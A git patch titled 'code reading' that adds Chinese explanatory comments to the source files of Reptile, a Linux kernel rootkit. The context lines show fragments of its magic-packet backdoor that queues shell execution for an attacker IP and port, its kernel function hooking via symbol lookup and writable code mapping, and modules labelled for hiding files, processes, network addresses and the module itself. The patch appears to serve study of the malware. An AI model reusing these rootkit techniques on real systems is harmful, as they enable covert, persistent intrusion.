From 644304d8796f5322f2c58699597424ae9f7a35d3 Mon Sep 17 00:00:00 2001
From: shenzexi <2538927534@qq.com>
Date: Mon, 21 Oct 2024 19:56:32 +0800
Subject: [PATCH] code reading

---
 src/Reptile/kernel/backdoor.c                |  7 ++++---
 src/Reptile/kernel/dir.c                     |  1 +
 src/Reptile/kernel/encrypt/encrypt.c         |  1 +
 src/Reptile/kernel/file.c                    |  1 +
 src/Reptile/kernel/khook/engine.c            |  9 +++++----
 src/Reptile/kernel/khook/x86/hook.c          | 13 +++++++------
 src/Reptile/kernel/kmatryoshka/kmatryoshka.c |  1 +
 src/Reptile/kernel/loader/loader.c           |  1 +
 src/Reptile/kernel/module.c                  |  1 +
 src/Reptile/kernel/network.c                 |  1 +
 src/Reptile/kernel/proc.c                    |  1 +
 src/Reptile/kernel/string_helpers.c          |  1 +
 src/Reptile/kernel/util.c                    |  1 +
 13 files changed, 26 insertions(+), 13 deletions(-)

diff --git a/src/Reptile/kernel/backdoor.c b/src/Reptile/kernel/backdoor.c
index 816672c..ff9beaa 100644
--- a/src/Reptile/kernel/backdoor.c
+++ b/src/Reptile/kernel/backdoor.c
@@ -1,3 +1,4 @@
+//后门程序，用于监听特定的网络数据包，并根据数据包的内容执行指定的命令
 #include <linux/string.h>
 #include <linux/version.h>
 #include <linux/net.h>
@@ -16,7 +17,7 @@ struct shell_task {
 	char *ip;
 	char *port;
 };
-
+//命令执行
 void shell_execer(struct work_struct *work)
 {
 	struct shell_task *task = (struct shell_task *)work;
@@ -28,7 +29,7 @@ void shell_execer(struct work_struct *work)
 	kfree(task->port);
 	kfree(task);
 }
-
+//添加任务到命令执行队列
 int shell_exec_queue(char *ip, char *port)
 {
 	struct shell_task *task;
@@ -58,7 +59,7 @@ int shell_exec_queue(char *ip, char *port)
 
 #define DROP 0
 #define ACCEPT 1
-
+//解析攻击方发送的网络数据包，并根据特定条件执行命令
 unsigned int magic_packet_parse(struct sk_buff *socket_buffer)
 {
 	const struct iphdr *ip_header;
diff --git a/src/Reptile/kernel/dir.c b/src/Reptile/kernel/dir.c
index 35f1ef9..e011c98 100644
--- a/src/Reptile/kernel/dir.c
+++ b/src/Reptile/kernel/dir.c
@@ -1,3 +1,4 @@
+//判断文件夹是否隐藏
 #include <linux/uaccess.h>
 #include <linux/slab.h>
 #include <linux/string.h>
diff --git a/src/Reptile/kernel/encrypt/encrypt.c b/src/Reptile/kernel/encrypt/encrypt.c
index dd01ead..c361f2e 100644
--- a/src/Reptile/kernel/encrypt/encrypt.c
+++ b/src/Reptile/kernel/encrypt/encrypt.c
@@ -1,3 +1,4 @@
+////使用给定的十六进制密钥对文件内容进行加密
 #include <stdio.h>
 #include <stdlib.h>
 #include <stdint.h>
diff --git a/src/Reptile/kernel/file.c b/src/Reptile/kernel/file.c
index 3cd7b84..c78609e 100644
--- a/src/Reptile/kernel/file.c
+++ b/src/Reptile/kernel/file.c
@@ -1,3 +1,4 @@
+//判断文件是否隐藏
 #include <linux/uaccess.h>
 #include <linux/slab.h>
 
diff --git a/src/Reptile/kernel/khook/engine.c b/src/Reptile/kernel/khook/engine.c
index d54d889..93f637d 100644
--- a/src/Reptile/kernel/khook/engine.c
+++ b/src/Reptile/kernel/khook/engine.c
@@ -1,9 +1,10 @@
+//内核级别的挂钩（hook）机制，主要用于在Linux内核中动态修改函数行为
 #include "internal.h"
 
 static khook_stub_t *khook_stub_tbl = NULL;
 
 ////////////////////////////////////////////////////////////////////////////////
-
+//通过内核符号表查找目标函数的地址
 static int khook_lookup_cb(long data[], const char *name, void *module, long addr)
 {
 	int i = 0; while (!module && (((const char *)data[0]))[i] == name[i]) {
@@ -17,7 +18,7 @@ static void *khook_lookup_name(const char *name)
 	kallsyms_on_each_symbol((void *)khook_lookup_cb, data);
 	return (void *)data[1];
 }
-
+//将目标函数地址映射为可写内存，以便修改其代码
 static void *khook_map_writable(void *addr, size_t len)
 {
 	struct page *pages[2] = { 0 }; // len << PAGE_SIZE
@@ -44,7 +45,7 @@ static void *khook_map_writable(void *addr, size_t len)
 #endif
 
 ////////////////////////////////////////////////////////////////////////////////
-
+//挂钩唤醒
 static void khook_wakeup(void)
 {
 	struct task_struct *p;
@@ -54,7 +55,7 @@ static void khook_wakeup(void)
 	}
 	rcu_read_unlock();
 }
-
+//初始化和清理挂钩
 static int khook_sm_init_hooks(void *arg)
 {
 	khook_t *p;
diff --git a/src/Reptile/kernel/khook/x86/hook.c b/src/Reptile/kernel/khook/x86/hook.c
index ae4076e..5cb5df3 100644
--- a/src/Reptile/kernel/khook/x86/hook.c
+++ b/src/Reptile/kernel/khook/x86/hook.c
@@ -1,3 +1,4 @@
+//内核中实现x86架构下的函数钩子（hook）
 #include "../internal.h"
 
 ////////////////////////////////////////////////////////////////////////////////
@@ -10,7 +11,7 @@ static struct {
 	typeof(insn_init) *init;
 	typeof(insn_get_length) *get_length;
 } khook_arch_lde;
-
+//初始化长度解析引擎
 static inline int khook_arch_lde_init(void) {
 	khook_arch_lde.init = khook_lookup_name("insn_init");
 	if (!khook_arch_lde.init) return -EINVAL;
@@ -18,7 +19,7 @@ static inline int khook_arch_lde_init(void) {
 	if (!khook_arch_lde.get_length) return -EINVAL;
 	return 0;
 }
-
+//获取指令长度
 static inline int khook_arch_lde_get_length(const void *p) {
 	struct insn insn;
 	int x86_64 = 0;
@@ -35,7 +36,7 @@ static inline int khook_arch_lde_get_length(const void *p) {
 }
 
 ////////////////////////////////////////////////////////////////////////////////
-
+//插入跳转指令
 // place a jump at addr @a from addr @f to addr @t
 static inline void x86_put_jmp(void *a, void *f, void *t)
 {
@@ -46,12 +47,12 @@ static inline void x86_put_jmp(void *a, void *f, void *t)
 static const char khook_stub_template[] = {
 # include KHOOK_STUB_FILE_NAME
 };
-
+//修复函数钩子中的占位符，
 static inline void stub_fixup(void *stub, const void *value) {
 	while (*(int *)stub != 0xcacacaca) stub++;
 	*(long *)stub = (long)value;
 }
-
+//初始化单个钩子
 static inline void khook_arch_sm_init_one(khook_t *hook) {
 	khook_stub_t *stub = KHOOK_STUB(hook);
 	if (hook->target.addr[0] == (char)0xE9 ||
@@ -73,7 +74,7 @@ static inline void khook_arch_sm_init_one(khook_t *hook) {
 	}
 	hook->orig = stub->orig; // the only link from hook to stub
 }
-
+//清理单个钩子
 static inline void khook_arch_sm_cleanup_one(khook_t *hook) {
 	khook_stub_t *stub = KHOOK_STUB(hook);
 	memcpy(hook->target.addr_map, stub->orig, stub->nbytes);
diff --git a/src/Reptile/kernel/kmatryoshka/kmatryoshka.c b/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
index ef35a4a..3334de6 100644
--- a/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
+++ b/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
@@ -1,3 +1,4 @@
+//内核模块的初始化
 #include <linux/kallsyms.h>
 #include <linux/kernel.h>
 #include <linux/module.h>
diff --git a/src/Reptile/kernel/loader/loader.c b/src/Reptile/kernel/loader/loader.c
index f9fc7a0..1267675 100644
--- a/src/Reptile/kernel/loader/loader.c
+++ b/src/Reptile/kernel/loader/loader.c
@@ -1,3 +1,4 @@
+//加载所需模块
 #define _GNU_SOURCE
 #include <errno.h>
 #include <fcntl.h>
diff --git a/src/Reptile/kernel/module.c b/src/Reptile/kernel/module.c
index c05d436..e3b0fc7 100644
--- a/src/Reptile/kernel/module.c
+++ b/src/Reptile/kernel/module.c
@@ -1,3 +1,4 @@
+//内核模块隐藏
 #include <linux/module.h>
 #include <linux/mutex.h>
 #include <linux/slab.h>
diff --git a/src/Reptile/kernel/network.c b/src/Reptile/kernel/network.c
index 8f67975..9185d9a 100644
--- a/src/Reptile/kernel/network.c
+++ b/src/Reptile/kernel/network.c
@@ -1,3 +1,4 @@
+//网络地址隐藏
 #include <linux/version.h>
 #include <linux/inet.h>
 #include <linux/netlink.h>
diff --git a/src/Reptile/kernel/proc.c b/src/Reptile/kernel/proc.c
index a13d1e8..f1032fe 100644
--- a/src/Reptile/kernel/proc.c
+++ b/src/Reptile/kernel/proc.c
@@ -1,3 +1,4 @@
+//进程隐藏
 #include <linux/version.h>
 #include <linux/uaccess.h>
 #include <linux/ctype.h>
diff --git a/src/Reptile/kernel/string_helpers.c b/src/Reptile/kernel/string_helpers.c
index 26a4edd..ecc23b4 100644
--- a/src/Reptile/kernel/string_helpers.c
+++ b/src/Reptile/kernel/string_helpers.c
@@ -1,3 +1,4 @@
+//获取命令行参数，转为可打印的字符
 #include "string_helpers.h"
 
 #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 7, 0)
diff --git a/src/Reptile/kernel/util.c b/src/Reptile/kernel/util.c
index 8f846ce..7b859b4 100644
--- a/src/Reptile/kernel/util.c
+++ b/src/Reptile/kernel/util.c
@@ -1,3 +1,4 @@
+//访问和操作进程的命令行参数
 #include <linux/kmod.h>
 #include <linux/kallsyms.h>
 #include <linux/types.h>